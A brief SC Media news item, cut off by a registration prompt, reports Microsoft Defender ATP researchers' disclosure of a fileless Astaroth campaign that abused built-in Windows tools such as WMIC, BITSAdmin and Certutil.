Microsoft’s Defender ATP Research Team yesterday revealed its discovery of a late-spring, fileless malware campaign that used "living-off-the-land" techniques to infected victims with information-stealing Astaroth backdoor.
The attackers behind this particular campaign abused a multiple of legitimate services in order to deliver the final payload, including the Windows Management Instrumentation Command-line tool (WMIC), the BITSAdmin command-line tool, the Certutil Certificate Services command-tool, the Regsvr32 command-line utility and the Userinit system tool.
"It's interesting to note that at no point during the attack chain is any file run that's not a system tool," remarked Andrew, Lelli, a member of the Defender ATP Research Team, in a company blog post. "In other words they [the attackers] use fileless techniques to silently install the malware on target devices."
Please register to continue.
Already registered? Log in.
Once you register, you'll receive:
-
News analysis
The context and insight you need to stay abreast of the most important developments in cybersecurity. CISO and practitioner perspectives; strategy and tactics; solutions and innovation; policy and regulation.
-
Archives
Unlimited access to nearly 20 years of SC Media industry analysis and news-you-can-use.
-
Daily Newswire
SC Media’s essential morning briefing for cybersecurity professionals.
-
Learning Express
One-click access to our extensive program of virtual events, with convenient calendar reminders and ability to earn CISSP credits.